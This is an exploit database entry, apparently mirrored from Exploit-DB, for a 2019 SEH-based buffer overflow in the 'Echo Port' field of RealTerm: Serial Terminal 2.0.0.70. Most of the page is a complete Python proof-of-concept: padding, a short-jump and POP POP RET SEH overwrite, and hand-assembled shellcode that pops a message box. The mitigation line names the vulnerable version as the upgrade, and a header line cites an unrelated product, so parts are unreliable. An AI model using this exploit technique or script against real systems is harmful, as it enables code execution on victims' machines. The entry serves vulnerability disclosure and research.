header-logo
Suggest Exploit
vendor:
RealTerm: Serial Terminal
by:
Matteo Malvica
7.8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: RealTerm: Serial Terminal
Affected Version From: 2.0.0.70
Affected Version To: 2.0.0.70
Patch Exists: YES
Related CWE: N/A
CPE: a:realterm:realterm:2.0.0.70
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 SP1 x64
2019

RealTerm: Serial Terminal 2.0.0.70 – ‘Echo Port’ Buffer Overflow – (SEH)

RealTerm: Serial Terminal 2.0.0.70 is vulnerable to a buffer overflow in the 'Echo Port' tab. An attacker can exploit this vulnerability by running a python script to create a new file 'carbonara.txt' containing malicious code. The attacker then copies the content of the new file to clipboard, opens realterm.exe, goes to 'Echo Port' tab, pastes the clipboard in 'Port' field, clicks on button -> Change, checks 'Echo On' or Box! and triggers the buffer overflow.

Mitigation:

Upgrade to the latest version of RealTerm: Serial Terminal 2.0.0.70
Source

Exploit-DB raw data:

# Exploit Title: RealTerm: Serial Terminal 2.0.0.70 - 'Echo Port' Buffer Overflow - (SEH) 
# Date: 21.02.2019
# Exploit Author: Matteo Malvica
# Vendor Homepage: https://realterm.sourceforge.io/
# Software Link: https://sourceforge.net/projects/realterm/files/ 
# Version: 2.0.0.70
# Category: Local
# Contact: https://twitter.com/matteomalvica
# Version: CloudMe Sync 1.11.2
# Tested on: Windows 7 SP1 x64
# Originail PoC https://www.exploit-db.com/exploits/46391

# 1.- Run the python script  it will create a new file "carbonara.txt"
# 2.- Copy the content of the new file 'carbonara.txt' to clipboard
# 3.- Open realterm.exe 
# 4.- Go to 'Echo Port' tab
# 5.- Paste clipboard in 'Port' field
# 6.- Click on button -> Change
# 7.- Check 'Echo On' or 
# 8.- Box!


import socket
import struct

'''
badchars: 0x20,0x0a
arwin.exe user32.dll MessageBoxA
arwin - win32 address resolution program - by steve hanna - v.01
MessageBoxA is located at 0x747cfdae in user32.dll
'''
shellcode = (
"\x33\xc0"                          # XOR EAX,EAX
"\x50"                              # PUSH EAX      => padding for lpCaption
"\x68\x7a\x6f\x21\x21"              # PUSH "zo!!"
"\x68\x61\x76\x61\x6e"              # PUSH "avan"
"\x8B\xCC"                          # MOV ECX,ESP   => PTR to lpCaption
"\x50"                              # PUSH EAX      => padding for lpText
"\x68\x6e\x7a\x6f\x21"              # PUSH "nzo!"
"\x68\x61\x76\x61\x21"              # PUSH "ava!"
"\x8B\xD4"                          # MOV EDX,ESP   => PTR to lpText
"\x50"                              # PUSH EAX - uType=0x0
"\x51"                              # PUSH ECX - lpCaption
"\x52"                              # PUSH EDX - lpText
"\x50"                              # PUSH EAX - hWnd=0x0
"\xBE\xae\xfd\x7c\x74"              # MOV ESI,USER32.MessageBoxA <<< hardcoded address
"\xFF\xD6")                         # CALL ESI

pad1="\x90"*(142-len(shellcode))
pad2 = "\x42" * 118
nseh = "\xEB\x80\x90\x90"
jmp_back = "\xEB\x80\x90\x90"
short_jmp = "\xEB\x12\x90\x90"
seh =  struct.pack('<L',0x00406e27)  # 00406e27# POP POP RET
nops = "\x90\x90\x90\x90"
payload = pad1  + shellcode + nops + jmp_back + pad2 + nseh + seh 


try:
        f=open("carbonara.txt","w")
        print "[+] Creating %s bytes pasta payload.." %len(payload)
        f.write(payload)
        f.close()
        print "[+] Carbonara created!"

except:
        print "Carbonara cannot be created"

Navigation

Suggest Exploit

Services By CQR